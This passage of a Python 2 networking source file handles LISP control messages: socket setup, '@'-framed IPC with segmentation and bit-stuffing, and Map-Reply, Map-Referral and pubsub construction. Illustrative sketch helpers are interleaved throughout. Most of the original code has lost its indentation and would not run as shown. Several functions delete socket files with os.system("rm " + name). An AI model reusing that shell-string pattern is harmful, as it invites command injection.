if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
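#
# Illustrative sketch of the zero-fill step above, not called by this file.
# A 64-bit longword whose leading byte is 0 loses digits when formatted as
# hex, so each piece must be zero-filled to its full width before the pieces
# are concatenated into the authentication string.
#
def lisp_zero_fill_sketch():
    longword = 0x00ab12cd34ef5678
    unfilled = "%x" % longword              # 14 hex digits, leading 00 lost
    filled = ("%x" % longword).zfill(16)    # 16 hex digits, as transmitted
    return(unfilled, filled)
#enddef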
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
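#
# Sketch of the dual-stack idea described above, not used by this module and
# assuming the platform supports the IPV6_V6ONLY socket option. An AF_INET6
# UDP socket bound to "::" with IPV6_V6ONLY cleared receives IPv4 senders as
# ::ffff:<ipv4> mapped addresses, so one socket serves both address families.
#
def lisp_open_dual_stack_socket_sketch(port):
    import socket
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
    sock.bind(("::", port))
    return(sock)
#enddef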
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
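#
# Sketch of parsing the "@"-delimited IPC framing built by the functions
# above; it is not called by this module. Bounding split() to 4 splits keeps
# "@" bytes inside the payload intact. The real receive path below instead
# splits unbounded and repairs the payload with lisp_bit_stuff().
#
def lisp_parse_ipc_sketch(message):
    opcode, length, source, port, payload = message.split("@", 4)
    return(opcode, int(length), source, port, payload)
#enddef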
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 bytes, or 9000 for control-packets) since the
# socket interface will not accept more. And socket.setsockopt() won't allow
# us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
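#
# Minimal sketch of the segmentation done by lisp_ipc() above, not called by
# this module: carve a buffer into fixed-size pieces. The receiver reassembles
# by subtracting the bytes received so far from the advertised total length.
#
def lisp_segment_sketch(buf, seg_len):
    segments = []
    offset = 0
    while (offset < len(buf)):
        segments.append(buf[offset:offset+seg_len])
        offset += seg_len
    #endwhile
    return(segments)
#enddef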
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
    length = len(packet)
    while (offset < length):
        new += packet[offset:offset+8] + " "
        offset += 8
    #endwhile
return(new)
#enddef
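#
# Example of the grouping done above, not called anywhere: 12 raw bytes
# hexlify to 24 hex digits, which print as three 8-digit (4-byte) groups,
# i.e. "45000054 abcd0000 40110000 ".
#
def lisp_format_packet_sketch():
    raw = "\x45\x00\x00\x54\xab\xcd\x00\x00\x40\x11\x00\x00"
    return(lisp_format_packet(raw))
#enddef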
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
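#
# Sketch of the TTL handling referenced above, not called by this module.
# RLOC-probe Map-Requests/Map-Replies go out with TTL 255 (see
# LISP_RLOC_PROBE_TTL) and the socket is set back to a default TTL after the
# send; the standard setsockopt() knob shown here is the usual way to set
# the TTL on an IPv4 socket. lisp_set_ttl() in this file is the real
# implementation.
#
def lisp_set_ttl_sketch(sock, ttl):
    import socket
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)
    return(sock)
#enddef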
#
# lisp_receive_segments
#
# Process 1500-byte segments if the received IPC packet is greater than what
# sockets can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
    # If the total length is equal to the segment length, we only have one
    # segment, which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
        # The sender gave up and sent a new message that made it to us; the
        # last partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
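#
# Sketch demonstrating why lisp_bit_stuff() exists, not called anywhere: a
# payload byte 0x40 ("@") is indistinguishable from the IPC delimiter, so an
# unbounded split() shreds the payload, and rejoining the pieces with 0x40
# restores it. The example message uses made-up field values.
#
def lisp_bit_stuff_sketch():
    payload = "\x40\x28\x00\x00"            # Map-Notify starts with 0x40
    fields = ("packet@4@lisp-ms@4342@" + payload).split("@")
    restored = lisp_bit_stuff(fields[4::])  # rejoin payload pieces with 0x40
    return(restored == payload)
#enddef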
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
        # sender, then IP did it, so it is assembled into a complete datagram
        # in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
            # ascii), we will confuse the IPC separator with real data.
            # So go to the payload and put in 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
    # we are an ETR not behind a NAT, we want to return the RLOC-probe
    # Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
    # address in the rtr-list for the sole purpose of identifying the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
    #endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
